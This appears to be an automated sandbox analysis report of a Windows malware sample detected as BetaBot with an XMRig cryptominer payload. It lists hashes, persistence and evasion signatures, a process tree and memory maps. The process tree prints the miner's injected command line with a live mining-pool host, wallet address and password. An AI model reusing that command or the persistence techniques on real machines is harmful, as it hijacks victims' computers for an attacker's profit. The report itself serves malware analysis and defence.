Analysis

  • max time kernel
    152s
  • max time network
    157s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    07-07-2022 23:58

General

  • Target

    43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe

  • Size

    2.1MB

  • MD5

    65c47159ad930504229825ef323aecf8

  • SHA1

    26974a01d0815a6f5cc63b34527a1a6a91ba2705

  • SHA256

    43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16

  • SHA512

    d2ccc975b97380f2c3d4fdc0d403f0b150b4e34eedc6b1e3f4d4d1ff773a6bb0d7dcb48cccfd83e8ac06ec2972006da9bc21481cadf02563dcc17cbe89888d77

Malware Config

Signatures

  • BetaBot

    Beta Bot is a Trojan that infects computers and disables Antivirus.

  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
  • Modifies firewall policy service 2 TTPs 4 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 3 IoCs
  • Executes dropped EXE 1 IoCs
  • Sets file execution options in registry 2 TTPs 4 IoCs
  • UPX packed file 5 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 1 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 1 IoCs
  • Adds Run key to start application 2 TTPs 8 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 13 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Modifies Internet Explorer Protected Mode 1 TTPs 4 IoCs
  • Modifies Internet Explorer Protected Mode Banner 1 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 31 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe
    "C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe"
    1⤵
    • Drops startup file
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1372
    • C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe
      "C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe"
      2⤵
      • Sets file execution options in registry
      • Checks whether UAC is enabled
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Checks processor information in registry
      • Suspicious behavior: MapViewOfSection
      • Suspicious behavior: RenamesItself
      • Suspicious use of AdjustPrivilegeToken
      PID:3504
      • C:\Windows\SysWOW64\explorer.exe
        C:\Windows\SysWOW64\explorer.exe
        3⤵
        • Modifies firewall policy service
        • Sets file execution options in registry
        • Checks BIOS information in registry
        • Adds Run key to start application
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Checks processor information in registry
        • Enumerates system info in registry
        • Modifies Internet Explorer Protected Mode
        • Modifies Internet Explorer Protected Mode Banner
        • Modifies Internet Explorer settings
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        PID:2000
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2000 -s 1168
          4⤵
          • Program crash
          PID:4724
    • C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe
      "C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe"
      2⤵
      • Adds Run key to start application
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:3036
      • C:\Windows\notepad.exe
        "C:\Windows\notepad.exe" -o pool.monero.hashvault.pro:5555:80 -u 48g2oLrkRG5JtnYA1pUukrYHgsu6aBqGTVxzZx6av6wvhBtgTHrKquWXMY2BJNnxs3aqj3U5RMnoZ6HaZYRMUouU8ke7kC4 -p trainwreck -v 0 -t 2
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:4424
    • C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe
      "C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe"
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2468
      • C:\Windows\SysWOW64\msiexec.exe
        C:\Windows\SysWOW64\msiexec.exe
        3⤵
        • Modifies WinLogon for persistence
        • Adds Run key to start application
        • Maps connected drives based on registry
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious behavior: EnumeratesProcesses
        PID:2240
        • C:\ProgramData\windervt\3a9uw5a3e.exe
          /prstb
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetWindowsHookEx
          PID:3876
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 2000 -ip 2000
    1⤵
      PID:1920

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\ProgramData\windervt\3a9uw5a3e.exe

      Filesize

      2.1MB

      MD5

      65c47159ad930504229825ef323aecf8

      SHA1

      26974a01d0815a6f5cc63b34527a1a6a91ba2705

      SHA256

      43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16

      SHA512

      d2ccc975b97380f2c3d4fdc0d403f0b150b4e34eedc6b1e3f4d4d1ff773a6bb0d7dcb48cccfd83e8ac06ec2972006da9bc21481cadf02563dcc17cbe89888d77

    • memory/1372-139-0x00000000008B0000-0x00000000008B7000-memory.dmp

      Filesize

      28KB

    • memory/1372-132-0x00000000008B0000-0x00000000008B7000-memory.dmp

      Filesize

      28KB

    • memory/2000-160-0x0000000000000000-mapping.dmp

    • memory/2000-167-0x00000000012B0000-0x0000000001535000-memory.dmp

      Filesize

      2.5MB

    • memory/2000-162-0x0000000000B70000-0x0000000000FA3000-memory.dmp

      Filesize

      4.2MB

    • memory/2000-163-0x00000000012B0000-0x0000000001535000-memory.dmp

      Filesize

      2.5MB

    • memory/2000-165-0x00000000012B0000-0x0000000001535000-memory.dmp

      Filesize

      2.5MB

    • memory/2240-164-0x00000000028C0000-0x0000000002B45000-memory.dmp

      Filesize

      2.5MB

    • memory/2240-157-0x0000000000000000-mapping.dmp

    • memory/2240-166-0x00000000028C0000-0x0000000002B45000-memory.dmp

      Filesize

      2.5MB

    • memory/2468-152-0x0000000000400000-0x00000000004AA000-memory.dmp

      Filesize

      680KB

    • memory/2468-143-0x0000000000400000-0x00000000004AA000-memory.dmp

      Filesize

      680KB

    • memory/2468-140-0x0000000000400000-0x00000000004AA000-memory.dmp

      Filesize

      680KB

    • memory/2468-137-0x0000000000000000-mapping.dmp

    • memory/2468-158-0x0000000000400000-0x00000000004AA000-memory.dmp

      Filesize

      680KB

    • memory/3036-142-0x0000000000400000-0x00000000004B7000-memory.dmp

      Filesize

      732KB

    • memory/3036-149-0x0000000000400000-0x00000000004B7000-memory.dmp

      Filesize

      732KB

    • memory/3036-135-0x0000000000000000-mapping.dmp

    • memory/3036-138-0x0000000000400000-0x00000000004B7000-memory.dmp

      Filesize

      732KB

    • memory/3504-155-0x0000000002880000-0x000000000288C000-memory.dmp

      Filesize

      48KB

    • memory/3504-141-0x0000000000400000-0x0000000000435000-memory.dmp

      Filesize

      212KB

    • memory/3504-136-0x0000000000400000-0x0000000000435000-memory.dmp

      Filesize

      212KB

    • memory/3504-133-0x0000000000000000-mapping.dmp

    • memory/3504-154-0x00000000006D0000-0x00000000006DD000-memory.dmp

      Filesize

      52KB

    • memory/3504-159-0x0000000000BC0000-0x0000000000C26000-memory.dmp

      Filesize

      408KB

    • memory/3504-151-0x0000000000BC0000-0x0000000000C26000-memory.dmp

      Filesize

      408KB

    • memory/3504-161-0x0000000000BC0000-0x0000000000C26000-memory.dmp

      Filesize

      408KB

    • memory/3504-147-0x0000000000400000-0x0000000000435000-memory.dmp

      Filesize

      212KB

    • memory/3504-134-0x0000000000400000-0x0000000000435000-memory.dmp

      Filesize

      212KB

    • memory/3876-168-0x0000000000000000-mapping.dmp

    • memory/4424-148-0x0000000000400000-0x00000000004DA000-memory.dmp

      Filesize

      872KB

    • memory/4424-145-0x00000000004D3D30-mapping.dmp

    • memory/4424-144-0x0000000000400000-0x00000000004DA000-memory.dmp

      Filesize

      872KB

    • memory/4424-146-0x0000000000400000-0x00000000004DA000-memory.dmp

      Filesize

      872KB

    • memory/4424-150-0x0000000000400000-0x00000000004DA000-memory.dmp

      Filesize

      872KB

    • memory/4424-156-0x0000000000400000-0x00000000004DA000-memory.dmp

      Filesize

      872KB